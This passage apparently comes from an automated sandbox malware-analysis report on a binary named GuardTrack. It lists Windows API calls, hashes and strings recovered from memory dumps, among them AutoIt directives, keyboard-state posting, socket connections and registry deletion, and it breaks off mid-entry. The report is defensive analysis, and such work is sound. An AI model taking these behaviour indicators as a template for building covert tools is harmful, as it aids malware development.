                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                          • String ID: @
                                                          • API String ID: 3522835683-2766056989
                                                          • Opcode ID: 7b537658aef03b4fb9f05926de350e46b2113254ce7f5e388ff23b636219c6fc
                                                          • Instruction ID: 622e928ed2a7b207a01cedc88f041f909e3849d382f1116bb90281019be0eeaf
                                                          • Opcode Fuzzy Hash: 7b537658aef03b4fb9f05926de350e46b2113254ce7f5e388ff23b636219c6fc
                                                          • Instruction Fuzzy Hash: D261C475A00A2ADFCB14EF94D4959AEBBF5FF88310F148469E846AB351CB30AD41CF94
                                                          APIs
                                                          • GetParent.USER32(?), ref: 0061178B
                                                          • GetKeyboardState.USER32(?), ref: 006117A0
                                                          • SetKeyboardState.USER32(?), ref: 00611801
                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0061182F
                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0061184E
                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00611894
                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006118B7
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 0031d65c487bc3d218e660b6f40eeca68b8d4e85b13b6e41b868c319501fc904
                                                          • Instruction ID: 0bfe1c1c2eadd7ece99d2c1bf79b1cb55cabf19858f0dfdd49b4d807b6119067
                                                          • Opcode Fuzzy Hash: 0031d65c487bc3d218e660b6f40eeca68b8d4e85b13b6e41b868c319501fc904
                                                          • Instruction Fuzzy Hash: 3151C3A0A187D53DFB368234C855BFA7EEB5B07304F0C8989E2D94DAC2D298ACD4D750
                                                          APIs
                                                          • GetParent.USER32(00000000), ref: 006115A4
                                                          • GetKeyboardState.USER32(?), ref: 006115B9
                                                          • SetKeyboardState.USER32(?), ref: 0061161A
                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00611646
                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00611663
                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006116A7
                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006116C8
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 21ea98f7d42f44e728fa4215e483d0d1d96dae62585df8e89f7b31481ba4394c
                                                          • Instruction ID: 6c75cef65215d2c46e405c3fa5ebee9f7be02163604cadc367cbcf86c1f5ae0a
                                                          • Opcode Fuzzy Hash: 21ea98f7d42f44e728fa4215e483d0d1d96dae62585df8e89f7b31481ba4394c
                                                          • Instruction Fuzzy Hash: DD51E6A05047D53DFB3287248C55BFABEAB5F07300F0C4589E2D54EAC2D695ACD4E7A1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _wcsncpy$LocalTime
                                                          • String ID:
                                                          • API String ID: 2945705084-0
                                                          • Opcode ID: 8c933de7a6f54303e3ebaa9ffc90a939047c7cbfc4f413b10ad5de8a3b5ef2b8
                                                          • Instruction ID: be19e1508371ed71a53769c4e8ac3b63f2248e691e081549a40ed31e56b56e8d
                                                          • Opcode Fuzzy Hash: 8c933de7a6f54303e3ebaa9ffc90a939047c7cbfc4f413b10ad5de8a3b5ef2b8
                                                          • Instruction Fuzzy Hash: 394190A5C10619B6CB61EBB8884A9CFB7B9EF84310F504857E509E3211E734A355C7EA
                                                          APIs
                                                            • Part of subcall function 00614BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00613B8A,?), ref: 00614BE0
                                                            • Part of subcall function 00614BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00613B8A,?), ref: 00614BF9
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00613BAA
                                                          • _wcscmp.LIBCMT ref: 00613BC6
                                                          • MoveFileW.KERNEL32(?,?), ref: 00613BDE
                                                          • _wcscat.LIBCMT ref: 00613C26
                                                          • SHFileOperationW.SHELL32(?), ref: 00613C92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 1377345388-1173974218
                                                          • Opcode ID: d3e74faef90af62fc39d19f38179c4f1c8eaebadc7161f215f64610fa12687e6
                                                          • Instruction ID: 48d08e3cf935e5b545f10809a186703a57dc2e7cc928e24257fa3aabb1434721
                                                          • Opcode Fuzzy Hash: d3e74faef90af62fc39d19f38179c4f1c8eaebadc7161f215f64610fa12687e6
                                                          • Instruction Fuzzy Hash: 4541BD7140C345AEC752EF64C485ADBB7EDAF89340F44196EF08AC3251EB34D7888B56
                                                          APIs
                                                          • _memset.LIBCMT ref: 006378CF
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00637976
                                                          • IsMenu.USER32(?), ref: 0063798E
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006379D6
                                                          • DrawMenuBar.USER32 ref: 006379E9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                          • String ID: 0
                                                          • API String ID: 3866635326-4108050209
                                                          • Opcode ID: 88acca4ec9eeaf89ee3a8617b647342ce921f8723631169397b5d157540a02fa
                                                          • Instruction ID: 448145558eb2de26402b082ceeb949a39624322092cb6a3404c7281d614ab61c
                                                          • Opcode Fuzzy Hash: 88acca4ec9eeaf89ee3a8617b647342ce921f8723631169397b5d157540a02fa
                                                          • Instruction Fuzzy Hash: 574105B5A04209EFDB20DF54D884ADABBFAFB09351F048269F95997390D770AD50CFA0
                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00631631
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0063165B
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00631712
                                                            • Part of subcall function 00631602: RegCloseKey.ADVAPI32(?), ref: 00631678
                                                            • Part of subcall function 00631602: FreeLibrary.KERNEL32(?), ref: 006316CA
                                                            • Part of subcall function 00631602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 006316ED
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 006316B5
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                          • String ID:
                                                          • API String ID: 395352322-0
                                                          • Opcode ID: 81f1b70e71b28a4dc21bdea8512861926500cc2a34ba636c9712e50790d60f76
                                                          • Instruction ID: 2e88324f3889d9e949f3c8e933eccbfa6d1e612969f830992a1a5341bb5f963f
                                                          • Opcode Fuzzy Hash: 81f1b70e71b28a4dc21bdea8512861926500cc2a34ba636c9712e50790d60f76
                                                          • Instruction Fuzzy Hash: 51313CB5901119BFEB149FD0DC89EFEBBBDEF0A300F040169E901A6250EB759E459BA4
                                                          APIs
                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00636911
                                                          • GetWindowLongW.USER32(00FF5C60,000000F0), ref: 00636944
                                                          • GetWindowLongW.USER32(00FF5C60,000000F0), ref: 00636979
                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 006369AB
                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 006369D5
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 006369E6
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00636A00
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$MessageSend
                                                          • String ID:
                                                          • API String ID: 2178440468-0
                                                          • Opcode ID: 4b01b2a6bfbc1d0365acc835bb8ff3e2e2df548e109d6222da91cb855c29bd63
                                                          • Instruction ID: 02054c8db36da6665ad83a218cd9b09a3eff4de1211a8dc2fbe00646e2119f9a
                                                          • Opcode Fuzzy Hash: 4b01b2a6bfbc1d0365acc835bb8ff3e2e2df548e109d6222da91cb855c29bd63
                                                          • Instruction Fuzzy Hash: 05313735604166AFEB20CF18DC88FA437E2EB4A351F1951A4F6098F2F2CB71AC50CB91
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0060E2CA
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0060E2F0
                                                          • SysAllocString.OLEAUT32(00000000), ref: 0060E2F3
                                                          • SysAllocString.OLEAUT32(?), ref: 0060E311
                                                          • SysFreeString.OLEAUT32(?), ref: 0060E31A
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0060E33F
                                                          • SysAllocString.OLEAUT32(?), ref: 0060E34D
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: def6d5b6939210fbaaf32a4a4d2afde4c422c7c3ad0fc92e66e253d6ae742510
                                                          • Instruction ID: 3f1f004dde3f44b29f9e8cb14ccbeb96de9f6d97d9bad553aaca56467284430f
                                                          • Opcode Fuzzy Hash: def6d5b6939210fbaaf32a4a4d2afde4c422c7c3ad0fc92e66e253d6ae742510
                                                          • Instruction Fuzzy Hash: 8E219776644229BFEF14DFA8DC88CBB77EDEB09360B044525FE14DB290D671AD418760
                                                          APIs
                                                            • Part of subcall function 00628475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006284A0
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006268B1
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 006268C0
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006268F9
                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00626902
                                                          • WSAGetLastError.WSOCK32 ref: 0062690C
                                                          • closesocket.WSOCK32(00000000), ref: 00626935
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0062694E
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 910771015-0
                                                          • Opcode ID: 4e2f4d9fec63d2a5d09cde2b7b18ee67f97c95d5caedbd80d55aaf8f5aad21f1
                                                          • Instruction ID: df02983380bd016171cb905d8d58c4f23cf59b1edf0f27d3f5c00a39390c3d3a
                                                          • Opcode Fuzzy Hash: 4e2f4d9fec63d2a5d09cde2b7b18ee67f97c95d5caedbd80d55aaf8f5aad21f1
                                                          • Instruction Fuzzy Hash: 2731E771600528AFEF10AF24DC85BFE7BAAEB45724F044019FD05AB291CB74AC448FA1
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0060E3A5
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0060E3CB
                                                          • SysAllocString.OLEAUT32(00000000), ref: 0060E3CE
                                                          • SysAllocString.OLEAUT32 ref: 0060E3EF
                                                          • SysFreeString.OLEAUT32 ref: 0060E3F8
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0060E412
                                                          • SysAllocString.OLEAUT32(?), ref: 0060E420
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: 7ca8ba5012be12bb3a84df97f5c52bb92168dd100ee81b431510fd18c7eb4104
                                                          • Instruction ID: 02cd68af20b5171f1e1679b0057e746b4c46c34cdc325a9e9b1b4f455f009db6
                                                          • Opcode Fuzzy Hash: 7ca8ba5012be12bb3a84df97f5c52bb92168dd100ee81b431510fd18c7eb4104
                                                          • Instruction Fuzzy Hash: 38218B35644215AFEB149FA8DC88DAF77EDEB493607408529FA05CB3A0D671DC418764
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                          • API String ID: 1038674560-2734436370
                                                          • Opcode ID: c7ac74b08ad1441bd3f42f5b306bfecdcd510141729ec644e03d7fc92308a027
                                                          • Instruction ID: 55c43b8de93df5b01e17ff5460c21112900a829620fc74228f78e4b03b9477e8
                                                          • Opcode Fuzzy Hash: c7ac74b08ad1441bd3f42f5b306bfecdcd510141729ec644e03d7fc92308a027
                                                          • Instruction Fuzzy Hash: A6213A3218021276D338AB24DC1AFF7779AAF91700F50443BF44586BE3E7A59D428395
                                                          APIs
                                                            • Part of subcall function 005B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005B214F
                                                            • Part of subcall function 005B2111: GetStockObject.GDI32(00000011), ref: 005B2163
                                                            • Part of subcall function 005B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 005B216D
                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00637C57
                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00637C64
                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00637C6F
                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00637C7E
                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00637C8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                          • String ID: Msctls_Progress32
                                                          • API String ID: 1025951953-3636473452
                                                          • Opcode ID: 5a06733d4b5fb023f46e18e5ddcbd0f663b3ad18dda371cdc774423bbd69a676
                                                          • Instruction ID: a48f2502baf71db3fd69d5a90afc05db3b390cea2003062b41aa55e603855e38
                                                          • Opcode Fuzzy Hash: 5a06733d4b5fb023f46e18e5ddcbd0f663b3ad18dda371cdc774423bbd69a676
                                                          • Instruction Fuzzy Hash: 9711B2B2140219BEEF258F60CC85EE77F5EEF09798F015114BB08A20A0C772AC21DBA4
                                                          APIs
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00600817,?,?,00000000,00000000), ref: 00619EE8
                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00600817,?,?,00000000,00000000), ref: 00619EFF
                                                          • LoadResource.KERNEL32(?,00000000,?,?,00600817,?,?,00000000,00000000,?,?,?,?,?,?,005C4A14), ref: 00619F0F
                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00600817,?,?,00000000,00000000,?,?,?,?,?,?,005C4A14), ref: 00619F20
                                                          • LockResource.KERNEL32(00600817,?,?,00600817,?,?,00000000,00000000,?,?,?,?,?,?,005C4A14,00000000), ref: 00619F2F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                          • String ID: SCRIPT
                                                          • API String ID: 3051347437-3967369404
                                                          • Opcode ID: bca474ef6765e7ea7363aea2b0fbf5cc4fc215e027ede91f0b02cc20920b3190
                                                          • Instruction ID: d78fe6d1ed20a6c664b05f59fcdc57803f64a58e8b0fd3a7f7ebf5d3358ea2b6
                                                          • Opcode Fuzzy Hash: bca474ef6765e7ea7363aea2b0fbf5cc4fc215e027ede91f0b02cc20920b3190
                                                          • Instruction Fuzzy Hash: CC115E74200700BFE7208B65DC48FA77BBAEBC9B11F148268BA09D6690DB71DC45C670
                                                          APIs
                                                          • __init_pointers.LIBCMT ref: 005D9D16
                                                            • Part of subcall function 005D33B7: EncodePointer.KERNEL32(00000000), ref: 005D33BA
                                                            • Part of subcall function 005D33B7: __initp_misc_winsig.LIBCMT ref: 005D33D5
                                                            • Part of subcall function 005D33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 005DA0D0
                                                            • Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 005DA0E4
                                                            • Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 005DA0F7
                                                            • Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 005DA10A
                                                            • Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 005DA11D
                                                            • Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 005DA130
                                                            • Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 005DA143
                                                            • Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 005DA156
                                                            • Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 005DA169
                                                            • Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 005DA17C
                                                            • Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 005DA18F
                                                            • Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 005DA1A2
                                                            • Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 005DA1B5
                                                            • Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 005DA1C8
                                                            • Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 005DA1DB
                                                            • Part of subcall function 005D33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 005DA1EE
                                                          • __mtinitlocks.LIBCMT ref: 005D9D1B
                                                          • __mtterm.LIBCMT ref: 005D9D24
                                                            • Part of subcall function 005D9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,005D9D29,005D7EFD,0066CD38,00000014), ref: 005D9E86
                                                            • Part of subcall function 005D9D8C: _free.LIBCMT ref: 005D9E8D
                                                            • Part of subcall function 005D9D8C: DeleteCriticalSection.KERNEL32(0Rg,?,?,005D9D29,005D7EFD,0066CD38,00000014), ref: 005D9EAF
                                                          • __calloc_crt.LIBCMT ref: 005D9D49
                                                          • __initptd.LIBCMT ref: 005D9D6B
                                                          • GetCurrentThreadId.KERNEL32 ref: 005D9D72
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
